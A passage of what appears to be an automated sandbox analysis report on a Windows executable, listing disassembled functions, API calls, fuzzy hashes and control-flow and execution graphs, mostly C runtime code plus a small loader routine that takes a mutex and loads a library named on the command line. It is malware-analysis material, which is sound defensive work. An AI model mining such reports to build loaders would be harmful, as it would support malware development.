                                                                                        • ___addlocaleref.LIBCMT ref: 00B2229C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                        • API String ID: 1028249917-2843748187
                                                                                        • Opcode ID: 9dde6ff21a021d4f401a2100a5f2b5422581a3c53517843b0679d60c8ac7b32d
                                                                                        • Instruction ID: 7d7daea5d2ab3def8d84af9a5457a9c31f791da994a622b5218dd9223f492667
                                                                                        • Opcode Fuzzy Hash: 9dde6ff21a021d4f401a2100a5f2b5422581a3c53517843b0679d60c8ac7b32d
                                                                                        • Instruction Fuzzy Hash: BA11C071801710EFE720EF75F806B4ABBE0AF14310F204599E49DD73A0CF749A418B25
                                                                                        Function 00B240A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 b240a0-b240bb call b2264c call b22345 267 b240da-b240f2 call b22aa0 262->267 268 b240bd-b240c1 262->268 275 b240f4-b240f6 267->275 276 b2412a-b24136 call b2413b 267->276 268->267 269 b240c3 268->269 271 b240c6-b240c8 269->271 273 b240d2-b240d9 call b22691 271->273 274 b240ca-b240d1 call b21411 271->274 274->273 277 b24112-b24124 InterlockedIncrement 275->277 278 b240f8-b24101 InterlockedDecrement 275->278 276->271 277->276 278->277 282 b24103-b24109 278->282 282->277 286 b2410b-b24111 call b235ee 282->286 286->277
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00B240AC
                                                                                          • Part of subcall function 00B22345: __getptd_noexit.LIBCMT ref: 00B22348
                                                                                          • Part of subcall function 00B22345: __amsg_exit.LIBCMT ref: 00B22355
                                                                                        • __amsg_exit.LIBCMT ref: 00B240CC
                                                                                        • __lock.LIBCMT ref: 00B240DC
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00B240F9
                                                                                        • InterlockedIncrement.KERNEL32(02572C68), ref: 00B24124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0
                                                                                        • Opcode ID: 62a98a7c71cd538113ea6d50165bfe04dc1b7b107bd4b0f4d52a06fe37a3890f
                                                                                        • Instruction ID: 551237db0bd1055071147ccc22eab43b37ee5c868b63f592ce6c24638cb0d2c5
                                                                                        • Opcode Fuzzy Hash: 62a98a7c71cd538113ea6d50165bfe04dc1b7b107bd4b0f4d52a06fe37a3890f
                                                                                        • Instruction Fuzzy Hash: 7601AD32901631EBDB25AF25B80675A77E0FF14B11F044085E90CB7A91CB34A992CFD6
                                                                                        Function 00B235EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 289 b235ee-b235ff call b2264c 292 b23601-b23608 289->292 293 b23676-b2367b call b22691 289->293 294 b2360a-b23622 call b22aa0 call b245e4 292->294 295 b2364d 292->295 307 b23624-b2362c call b24614 294->307 308 b2362d-b2363d call b23644 294->308 297 b2364e-b2365e HeapFree 295->297 297->293 300 b23660-b23675 call b22c72 GetLastError call b22c30 297->300 300->293 307->308 308->293 314 b2363f-b23642 308->314 314->297
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B2360C
                                                                                          • Part of subcall function 00B22AA0: __mtinitlocknum.LIBCMT ref: 00B22AB6
                                                                                          • Part of subcall function 00B22AA0: __amsg_exit.LIBCMT ref: 00B22AC2
                                                                                          • Part of subcall function 00B22AA0: EnterCriticalSection.KERNEL32(?,?,?,00B25600,00000004,00B29628,0000000C,00B23746,?,?,00000000,00000000,00000000,?,00B222F7,00000001), ref: 00B22ACA
                                                                                        • ___sbh_find_block.LIBCMT ref: 00B23617
                                                                                        • ___sbh_free_block.LIBCMT ref: 00B23626
                                                                                        • HeapFree.KERNEL32(00000000,?,00B29568,0000000C,00B22A81,00000000,00B294C8,0000000C,00B22ABB,?,?,?,00B25600,00000004,00B29628,0000000C), ref: 00B23656
                                                                                        • GetLastError.KERNEL32(?,00B25600,00000004,00B29628,0000000C,00B23746,?,?,00000000,00000000,00000000,?,00B222F7,00000001,00000214), ref: 00B23667
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 2714421763-0
                                                                                        • Opcode ID: 6da0786ecfdd44fc211145515d8f996c38806697f71347b5ef8c8c35e5bfa5c4
                                                                                        • Instruction ID: 9a4cf565c1b772ba18c1c3d256dc1ff1cb32cfabe1899bf1c6cae487745be45e
                                                                                        • Opcode Fuzzy Hash: 6da0786ecfdd44fc211145515d8f996c38806697f71347b5ef8c8c35e5bfa5c4
                                                                                        • Instruction Fuzzy Hash: 60012C71D09325BADB326F71BC06B5E36E8EF11B60F604089B54CA6291CE3C8A418A59
                                                                                        Function 00B23E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00B23E10
                                                                                          • Part of subcall function 00B22345: __getptd_noexit.LIBCMT ref: 00B22348
                                                                                          • Part of subcall function 00B22345: __amsg_exit.LIBCMT ref: 00B22355
                                                                                        • __getptd.LIBCMT ref: 00B23E27
                                                                                        • __amsg_exit.LIBCMT ref: 00B23E35
                                                                                        • __lock.LIBCMT ref: 00B23E45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 3521780317-0
                                                                                        • Opcode ID: 64dc8c25286e0ee0bc66418efda177efe92d83c237131b4beaace4666ce3dfc7
                                                                                        • Instruction ID: be7ed71f0902c8300e740dae695cdd80dae128e5179bec5e172a4865e2d123e3
                                                                                        • Opcode Fuzzy Hash: 64dc8c25286e0ee0bc66418efda177efe92d83c237131b4beaace4666ce3dfc7
                                                                                        • Instruction Fuzzy Hash: 85F06D329003309BD761FB74B40774D72E0AF58B10F1145D9A45D972A1CF789A46CA62

                                                                                        Execution Graph

                                                                                        Execution Coverage:6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1048
                                                                                        Total number of Limit Nodes:28
                                                                                        execution_graph 4427 6c458d 4430 6c29c6 LeaveCriticalSection 4427->4430 4429 6c4594 4430->4429 4389 6c122e 4392 6c18fe 4389->4392 4393 6c22cc __getptd_noexit 66 API calls 4392->4393 4394 6c123f 4393->4394 3947 6c67c8 RtlUnwind 3207 6c1104 3244 6c264c 3207->3244 3209 6c1110 GetStartupInfoW 3210 6c1133 3209->3210 3245 6c261b HeapCreate 3210->3245 3213 6c1183 3247 6c248e GetModuleHandleW 3213->3247 3217 6c1194 __RTC_Initialize 3281 6c1dde 3217->3281 3218 6c10db _fast_error_exit 66 API calls 3218->3217 3220 6c11a2 3221 6c11ae GetCommandLineW 3220->3221 3355 6c1411 3220->3355 3296 6c1d81 GetEnvironmentStringsW 3221->3296 3225 6c11bd 3305 6c1cd3 GetModuleFileNameW 3225->3305 3228 6c11d2 3311 6c1aa4 3228->3311 3229 6c1411 __amsg_exit 66 API calls 3229->3228 3232 6c11e3 3324 6c14d0 3232->3324 3233 6c1411 __amsg_exit 66 API calls 3233->3232 3235 6c11ea 3236 6c1411 __amsg_exit 66 API calls 3235->3236 3237 6c11f5 __wwincmdln 3235->3237 3236->3237 3330 6c1000 CoInitialize CreateMutexW 3237->3330 3239 6c1216 3240 6c1224 3239->3240 3344 6c1681 3239->3344 3362 6c16ad 3240->3362 3243 6c1229 __calloc_impl 3244->3209 3246 6c1177 3245->3246 3246->3213 3347 6c10db 3246->3347 3248 6c24a9 3247->3248 3249 6c24a2 3247->3249 3251 6c2611 3248->3251 3252 6c24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3248->3252 3365 6c13e1 3249->3365 3424 6c21a8 3251->3424 3255 6c24fc TlsAlloc 3252->3255 3257 6c1189 3255->3257 3258 6c254a TlsSetValue 3255->3258 3257->3217 3257->3218 3258->3257 3259 6c255b 3258->3259 3369 6c16cb 3259->3369 3264 6c207e __encode_pointer 6 API calls 3265 6c257b 3264->3265 3266 6c207e __encode_pointer 6 API calls 3265->3266 3267 6c258b 3266->3267 3268 6c207e __encode_pointer 6 API calls 3267->3268 3269 6c259b 3268->3269 3386 6c2924 3269->3386 3276 6c20f9 __decode_pointer 6 API calls 3277 6c25ef 3276->3277 3277->3251 3278 6c25f6 3277->3278 3406 6c21e5 3278->3406 3280 6c25fe GetCurrentThreadId 3280->3257 3751 6c264c 3281->3751 3283 6c1dea GetStartupInfoA 3284 6c3730 __calloc_crt 66 API calls 3283->3284 3290 6c1e0b 3284->3290 3285 6c2029 __calloc_impl 3285->3220 3286 6c1fa6 GetStdHandle 3291 6c1f70 3286->3291 3287 6c3730 __calloc_crt 66 API calls 3287->3290 3288 6c200b SetHandleCount 3288->3285 3289 6c1fb8 GetFileType 3289->3291 3290->3285 3290->3287 3290->3291 3294 6c1ef3 3290->3294 3291->3285 3291->3286 3291->3288 3291->3289 3292 6c317c __ioinit InitializeCriticalSectionAndSpinCount 3291->3292 3292->3291 3293 6c1f1c GetFileType 3293->3294 3294->3285 3294->3291 3294->3293 3295 6c317c __ioinit InitializeCriticalSectionAndSpinCount 3294->3295 3295->3294 3297 6c1d92 3296->3297 3299 6c1d96 3296->3299 3297->3225 3298 6c1da9 3300 6c36eb __malloc_crt 66 API calls 3298->3300 3299->3298 3299->3299 3301 6c1db7 3300->3301 3302 6c1dbe FreeEnvironmentStringsW 3301->3302 3752 6c37f0 3301->3752 3302->3225 3306 6c1d08 _wparse_cmdline 3305->3306 3307 6c11c7 3306->3307 3308 6c1d45 3306->3308 3307->3228 3307->3229 3309 6c36eb __malloc_crt 66 API calls 3308->3309 3310 6c1d4b _wparse_cmdline 3309->3310 3310->3307 3312 6c1abc _wcslen 3311->3312 3314 6c11d8 3311->3314 3313 6c3730 __calloc_crt 66 API calls 3312->3313 3321 6c1ae0 _wcslen 3313->3321 3314->3232 3314->3233 3315 6c1b45 3316 6c35ee ___free_lconv_num 66 API calls 3315->3316 3316->3314 3317 6c3730 __calloc_crt 66 API calls 3317->3321 3318 6c1b6b 3319 6c35ee ___free_lconv_num 66 API calls 3318->3319 3319->3314 3321->3314 3321->3315 3321->3317 3321->3318 3322 6c1b2a 3321->3322 3756 6c367c 3321->3756 3322->3321 3323 6c2ae2 __invoke_watson 10 API calls 3322->3323 3323->3322 3326 6c14de __IsNonwritableInCurrentImage 3324->3326 3765 6c2dc3 3326->3765 3327 6c14fc __initterm_e 3329 6c151b __IsNonwritableInCurrentImage __initterm 3327->3329 3769 6c2dac 3327->3769 3329->3235 3331 6c101f GetLastError 3330->3331 3332 6c1035 GetCommandLineW CommandLineToArgvW 3330->3332 3331->3332 3333 6c102c 3331->3333 3334 6c1056 PathFileExistsW 3332->3334 3335 6c1067 3332->3335 3333->3239 3334->3335 3336 6c106e PathFileExistsW 3334->3336 3337 6c1084 LoadLibraryW 3335->3337 3336->3335 3336->3337 3338 6c10aa CloseHandle CoUninitialize 3337->3338 3339 6c1091 GetProcAddress 3337->3339 3340 6c10bb LocalFree 3338->3340 3341 6c10c2 3338->3341 3342 6c10a1 3339->3342 3343 6c10a3 FreeLibrary 3339->3343 3340->3341 3341->3239 3342->3343 3343->3338 3870 6c1555 3344->3870 3346 6c1692 3346->3240 3348 6c10ee 3347->3348 3349 6c10e9 3347->3349 3351 6c1719 __NMSG_WRITE 66 API calls 3348->3351 3350 6c18c4 __FF_MSGBANNER 66 API calls 3349->3350 3350->3348 3352 6c10f6 3351->3352 3353 6c1465 _fast_error_exit 3 API calls 3352->3353 3354 6c1100 3353->3354 3354->3213 3356 6c18c4 __FF_MSGBANNER 66 API calls 3355->3356 3357 6c141b 3356->3357 3358 6c1719 __NMSG_WRITE 66 API calls 3357->3358 3359 6c1423 3358->3359 3360 6c20f9 __decode_pointer 6 API calls 3359->3360 3361 6c11ad 3360->3361 3361->3221 3363 6c1555 _doexit 66 API calls 3362->3363 3364 6c16b8 3363->3364 3364->3243 3366 6c13ec Sleep GetModuleHandleW 3365->3366 3367 6c140e 3366->3367 3368 6c140a 3366->3368 3367->3248 3368->3366 3368->3367 3435 6c20f0 3369->3435 3371 6c16d3 __init_pointers __initp_misc_winsig 3438 6c2913 3371->3438 3374 6c207e __encode_pointer 6 API calls 3375 6c170f 3374->3375 3376 6c207e TlsGetValue 3375->3376 3377 6c2096 3376->3377 3378 6c20b7 GetModuleHandleW 3376->3378 3377->3378 3381 6c20a0 TlsGetValue 3377->3381 3379 6c20c7 3378->3379 3380 6c20d2 GetProcAddress 3378->3380 3382 6c13e1 __crt_waiting_on_module_handle 2 API calls 3379->3382 3383 6c20af 3380->3383 3385 6c20ab 3381->3385 3384 6c20cd 3382->3384 3383->3264 3384->3380 3384->3383 3385->3378 3385->3383 3387 6c292f 3386->3387 3389 6c25a8 3387->3389 3441 6c317c 3387->3441 3389->3251 3390 6c20f9 TlsGetValue 3389->3390 3391 6c2111 3390->3391 3392 6c2132 GetModuleHandleW 3390->3392 3391->3392 3393 6c211b TlsGetValue 3391->3393 3394 6c214d GetProcAddress 3392->3394 3395 6c2142 3392->3395 3397 6c2126 3393->3397 3399 6c212a 3394->3399 3396 6c13e1 __crt_waiting_on_module_handle 2 API calls 3395->3396 3398 6c2148 3396->3398 3397->3392 3397->3399 3398->3394 3398->3399 3399->3251 3400 6c3730 3399->3400 3402 6c3739 3400->3402 3403 6c25d5 3402->3403 3404 6c3757 Sleep 3402->3404 3446 6c557f 3402->3446 3403->3251 3403->3276 3405 6c376c 3404->3405 3405->3402 3405->3403 3730 6c264c 3406->3730 3408 6c21f1 GetModuleHandleW 3409 6c2201 3408->3409 3414 6c2207 3408->3414 3412 6c13e1 __crt_waiting_on_module_handle 2 API calls 3409->3412 3410 6c221f GetProcAddress GetProcAddress 3411 6c2243 3410->3411 3413 6c2aa0 __lock 62 API calls 3411->3413 3412->3414 3415 6c2262 InterlockedIncrement 3413->3415 3414->3410 3414->3411 3731 6c22ba 3415->3731 3418 6c2aa0 __lock 62 API calls 3419 6c2283 3418->3419 3734 6c3c9e InterlockedIncrement 3419->3734 3421 6c22a1 3746 6c22c3 3421->3746 3423 6c22ae __calloc_impl 3423->3280 3425 6c21be 3424->3425 3426 6c21b2 3424->3426 3428 6c21d2 TlsFree 3425->3428 3429 6c21e0 3425->3429 3427 6c20f9 __decode_pointer 6 API calls 3426->3427 3427->3425 3428->3429 3430 6c298b DeleteCriticalSection 3429->3430 3431 6c29a3 3429->3431 3432 6c35ee ___free_lconv_num 66 API calls 3430->3432 3433 6c29b5 DeleteCriticalSection 3431->3433 3434 6c29c3 3431->3434 3432->3429 3433->3431 3434->3257 3436 6c207e __encode_pointer 6 API calls 3435->3436 3437 6c20f7 3436->3437 3437->3371 3439 6c207e __encode_pointer 6 API calls 3438->3439 3440 6c1705 3439->3440 3440->3374 3445 6c264c 3441->3445 3443 6c3188 InitializeCriticalSectionAndSpinCount 3444 6c31cc __calloc_impl 3443->3444 3444->3387 3445->3443 3447 6c558b __calloc_impl 3446->3447 3448 6c55c2 __calloc_impl 3447->3448 3449 6c55a3 3447->3449 3452 6c5634 HeapAlloc 3448->3452 3456 6c55b8 __calloc_impl 3448->3456 3465 6c2aa0 3448->3465 3472 6c4dc3 3448->3472 3478 6c567b 3448->3478 3481 6c31eb 3448->3481 3459 6c2c72 3449->3459 3452->3448 3456->3402 3484 6c22cc GetLastError 3459->3484 3461 6c2c77 3462 6c2c0a 3461->3462 3463 6c20f9 __decode_pointer 6 API calls 3462->3463 3464 6c2c1a __invoke_watson 3463->3464 3466 6c2ac8 EnterCriticalSection 3465->3466 3467 6c2ab5 3465->3467 3466->3448 3526 6c29dd 3467->3526 3469 6c2abb 3469->3466 3470 6c1411 __amsg_exit 65 API calls 3469->3470 3471 6c2ac7 3470->3471 3471->3466 3474 6c4df1 3472->3474 3473 6c4e8a 3477 6c4e93 3473->3477 3725 6c49da 3473->3725 3474->3473 3474->3477 3718 6c492a 3474->3718 3477->3448 3729 6c29c6 LeaveCriticalSection 3478->3729 3480 6c5682 3480->3448 3482 6c20f9 __decode_pointer 6 API calls 3481->3482 3483 6c31fb 3482->3483 3483->3448 3498 6c2174 TlsGetValue 3484->3498 3487 6c2339 SetLastError 3487->3461 3488 6c3730 __calloc_crt 63 API calls 3489 6c22f7 3488->3489 3489->3487 3490 6c20f9 __decode_pointer 6 API calls 3489->3490 3491 6c2311 3490->3491 3492 6c2318 3491->3492 3493 6c2330 3491->3493 3494 6c21e5 __mtinit 63 API calls 3492->3494 3503 6c35ee 3493->3503 3496 6c2320 GetCurrentThreadId 3494->3496 3496->3487 3497 6c2336 3497->3487 3499 6c2189 3498->3499 3500 6c21a4 3498->3500 3501 6c20f9 __decode_pointer 6 API calls 3499->3501 3500->3487 3500->3488 3502 6c2194 TlsSetValue 3501->3502 3502->3500 3505 6c35fa __calloc_impl 3503->3505 3504 6c3673 _realloc __calloc_impl 3504->3497 3505->3504 3507 6c2aa0 __lock 64 API calls 3505->3507 3515 6c3639 3505->3515 3506 6c364e HeapFree 3506->3504 3508 6c3660 3506->3508 3512 6c3611 ___sbh_find_block 3507->3512 3509 6c2c72 __calloc_impl 64 API calls 3508->3509 3510 6c3665 GetLastError 3509->3510 3510->3504 3511 6c362b 3522 6c3644 3511->3522 3512->3511 3516 6c4614 3512->3516 3515->3504 3515->3506 3517 6c4653 3516->3517 3521 6c48f5 ___sbh_free_block 3516->3521 3518 6c483f VirtualFree 3517->3518 3517->3521 3519 6c48a3 3518->3519 3520 6c48b2 VirtualFree HeapFree 3519->3520 3519->3521 3520->3521 3521->3511 3525 6c29c6 LeaveCriticalSection 3522->3525 3524 6c364b 3524->3515 3525->3524 3527 6c29e9 __calloc_impl 3526->3527 3528 6c2a0f 3527->3528 3552 6c18c4 3527->3552 3534 6c2a1f __calloc_impl 3528->3534 3598 6c36eb 3528->3598 3534->3469 3536 6c2a40 3540 6c2aa0 __lock 66 API calls 3536->3540 3537 6c2a31 3539 6c2c72 __calloc_impl 66 API calls 3537->3539 3539->3534 3541 6c2a47 3540->3541 3542 6c2a4f 3541->3542 3543 6c2a7b 3541->3543 3544 6c317c __ioinit InitializeCriticalSectionAndSpinCount 3542->3544 3545 6c35ee ___free_lconv_num 66 API calls 3543->3545 3546 6c2a5a 3544->3546 3547 6c2a6c 3545->3547 3546->3547 3548 6c35ee ___free_lconv_num 66 API calls 3546->3548 3603 6c2a97 3547->3603 3550 6c2a66 3548->3550 3551 6c2c72 __calloc_impl 66 API calls 3550->3551 3551->3547 3606 6c35a3 3552->3606 3554 6c18d8 3557 6c1719 __NMSG_WRITE 66 API calls 3554->3557 3559 6c18fa 3554->3559 3556 6c35a3 __set_error_mode 66 API calls 3556->3554 3558 6c18f0 3557->3558 3560 6c1719 __NMSG_WRITE 66 API calls 3558->3560 3561 6c1719 3559->3561 3560->3559 3562 6c172d 3561->3562 3563 6c35a3 __set_error_mode 63 API calls 3562->3563 3594 6c1888 3562->3594 3564 6c174f 3563->3564 3565 6c188d GetStdHandle 3564->3565 3567 6c35a3 __set_error_mode 63 API calls 3564->3567 3566 6c189b _strlen 3565->3566 3565->3594 3570 6c18b4 WriteFile 3566->3570 3566->3594 3568 6c1760 3567->3568 3568->3565 3569 6c1772 3568->3569 3569->3594 3612 6c353b 3569->3612 3570->3594 3573 6c17a8 GetModuleFileNameA 3575 6c17c6 3573->3575 3579 6c17e9 _strlen 3573->3579 3577 6c353b _strcpy_s 63 API calls 3575->3577 3578 6c17d6 3577->3578 3578->3579 3581 6c2ae2 __invoke_watson 10 API calls 3578->3581 3580 6c182c 3579->3580 3628 6c33f0 3579->3628 3637 6c337c 3580->3637 3581->3579 3585 6c1850 3588 6c337c _strcat_s 63 API calls 3585->3588 3587 6c2ae2 __invoke_watson 10 API calls 3587->3585 3589 6c1864 3588->3589 3591 6c1875 3589->3591 3592 6c2ae2 __invoke_watson 10 API calls 3589->3592 3590 6c2ae2 __invoke_watson 10 API calls 3590->3580 3646 6c3213 3591->3646 3592->3591 3595 6c1465 3594->3595 3684 6c143a GetModuleHandleW 3595->3684 3599 6c36f4 3598->3599 3601 6c2a2a 3599->3601 3602 6c370b Sleep 3599->3602 3688 6c54b5 3599->3688 3601->3536 3601->3537 3602->3599 3717 6c29c6 LeaveCriticalSection 3603->3717 3605 6c2a9e 3605->3534 3607 6c35b2 3606->3607 3608 6c2c72 __calloc_impl 66 API calls 3607->3608 3611 6c18cb 3607->3611 3609 6c35d5 3608->3609 3610 6c2c0a __calloc_impl 6 API calls 3609->3610 3610->3611 3611->3554 3611->3556 3613 6c354c 3612->3613 3614 6c3553 3612->3614 3613->3614 3619 6c3579 3613->3619 3615 6c2c72 __calloc_impl 66 API calls 3614->3615 3616 6c3558 3615->3616 3617 6c2c0a __calloc_impl 6 API calls 3616->3617 3618 6c1794 3617->3618 3618->3573 3621 6c2ae2 3618->3621 3619->3618 3620 6c2c72 __calloc_impl 66 API calls 3619->3620 3620->3616 3673 6c5320 3621->3673 3623 6c2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3624 6c2bdf __invoke_watson 3623->3624 3625 6c2beb GetCurrentProcess TerminateProcess 3623->3625 3624->3625 3675 6c10cc 3625->3675 3627 6c17a5 3627->3573 3632 6c3402 3628->3632 3629 6c3406 3630 6c1819 3629->3630 3631 6c2c72 __calloc_impl 66 API calls 3629->3631 3630->3580 3630->3590 3633 6c3422 3631->3633 3632->3629 3632->3630 3635 6c344c 3632->3635 3634 6c2c0a __calloc_impl 6 API calls 3633->3634 3634->3630 3635->3630 3636 6c2c72 __calloc_impl 66 API calls 3635->3636 3636->3633 3638 6c3394 3637->3638 3640 6c338d 3637->3640 3639 6c2c72 __calloc_impl 66 API calls 3638->3639 3645 6c3399 3639->3645 3640->3638 3642 6c33c8 3640->3642 3641 6c2c0a __calloc_impl 6 API calls 3643 6c183f 3641->3643 3642->3643 3644 6c2c72 __calloc_impl 66 API calls 3642->3644 3643->3585 3643->3587 3644->3645 3645->3641 3647 6c20f0 ___crtMessageBoxW 6 API calls 3646->3647 3648 6c3223 3647->3648 3649 6c3236 LoadLibraryA 3648->3649 3650 6c32be 3648->3650 3651 6c324b GetProcAddress 3649->3651 3652 6c3360 3649->3652 3657 6c20f9 __decode_pointer 6 API calls 3650->3657 3665 6c32e8 3650->3665 3651->3652 3654 6c3261 3651->3654 3652->3594 3653 6c3313 3655 6c20f9 __decode_pointer 6 API calls 3653->3655 3658 6c207e __encode_pointer 6 API calls 3654->3658 3655->3652 3656 6c20f9 __decode_pointer 6 API calls 3667 6c332b 3656->3667 3659 6c32db 3657->3659 3660 6c3267 GetProcAddress 3658->3660 3661 6c20f9 __decode_pointer 6 API calls 3659->3661 3662 6c207e __encode_pointer 6 API calls 3660->3662 3661->3665 3663 6c327c GetProcAddress 3662->3663 3664 6c207e __encode_pointer 6 API calls 3663->3664 3666 6c3291 GetProcAddress 3664->3666 3665->3653 3665->3656 3668 6c207e __encode_pointer 6 API calls 3666->3668 3667->3653 3669 6c20f9 __decode_pointer 6 API calls 3667->3669 3670 6c32a6 3668->3670 3669->3653 3670->3650 3671 6c32b0 GetProcAddress 3670->3671 3672 6c207e __encode_pointer 6 API calls 3671->3672 3672->3650 3674 6c532c __VEC_memzero 3673->3674 3674->3623 3676 6c10d4 3675->3676 3677 6c10d6 IsDebuggerPresent 3675->3677 3676->3627 3683 6c28d2 3677->3683 3680 6c1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3681 6c137d GetCurrentProcess TerminateProcess 3680->3681 3682 6c1375 __invoke_watson 3680->3682 3681->3627 3682->3681 3683->3680 3685 6c144e GetProcAddress 3684->3685 3686 6c1463 ExitProcess 3684->3686 3685->3686 3687 6c145e 3685->3687 3687->3686 3689 6c5568 3688->3689 3698 6c54c7 3688->3698 3690 6c31eb __calloc_impl 6 API calls 3689->3690 3691 6c556e 3690->3691 3693 6c2c72 __calloc_impl 65 API calls 3691->3693 3692 6c18c4 __FF_MSGBANNER 65 API calls 3692->3698 3704 6c5560 3693->3704 3695 6c1719 __NMSG_WRITE 65 API calls 3695->3698 3696 6c5524 HeapAlloc 3696->3698 3697 6c1465 _fast_error_exit 3 API calls 3697->3698 3698->3692 3698->3695 3698->3696 3698->3697 3699 6c5554 3698->3699 3700 6c31eb __calloc_impl 6 API calls 3698->3700 3702 6c5559 3698->3702 3698->3704 3705 6c5466 3698->3705 3701 6c2c72 __calloc_impl 65 API calls 3699->3701 3700->3698 3701->3702 3703 6c2c72 __calloc_impl 65 API calls 3702->3703 3703->3704 3704->3599 3706 6c5472 __calloc_impl 3705->3706 3707 6c54a3 __calloc_impl 3706->3707 3708 6c2aa0 __lock 66 API calls 3706->3708 3707->3698 3709 6c5488 3708->3709 3710 6c4dc3 ___sbh_alloc_block 5 API calls 3709->3710 3711 6c5493 3710->3711 3713 6c54ac 3711->3713 3716 6c29c6 LeaveCriticalSection 3713->3716 3715 6c54b3 3715->3707 3716->3715 3717->3605 3719 6c493d HeapReAlloc 3718->3719 3720 6c4971 HeapAlloc 3718->3720 3721 6c495f 3719->3721 3722 6c495b 3719->3722 3720->3722 3723 6c4994 VirtualAlloc 3720->3723 3721->3720 3722->3473 3723->3722 3724 6c49ae HeapFree 3723->3724 3724->3722 3726 6c49f1 VirtualAlloc 3725->3726 3728 6c4a38 3726->3728 3728->3477 3729->3480 3730->3408 3749 6c29c6 LeaveCriticalSection 3731->3749 3733 6c227c 3733->3418 3735 6c3cbc InterlockedIncrement 3734->3735 3736 6c3cbf 3734->3736 3735->3736 3737 6c3ccc 3736->3737 3738 6c3cc9 InterlockedIncrement 3736->3738 3739 6c3cd9 3737->3739 3740 6c3cd6 InterlockedIncrement 3737->3740 3738->3737 3741 6c3ce3 InterlockedIncrement 3739->3741 3743 6c3ce6 3739->3743 3740->3739 3741->3743 3742 6c3cff InterlockedIncrement 3742->3743 3743->3742 3744 6c3d1a InterlockedIncrement 3743->3744 3745 6c3d0f InterlockedIncrement 3743->3745 3744->3421 3745->3743 3750 6c29c6 LeaveCriticalSection 3746->3750 3748 6c22ca 3748->3423 3749->3733 3750->3748 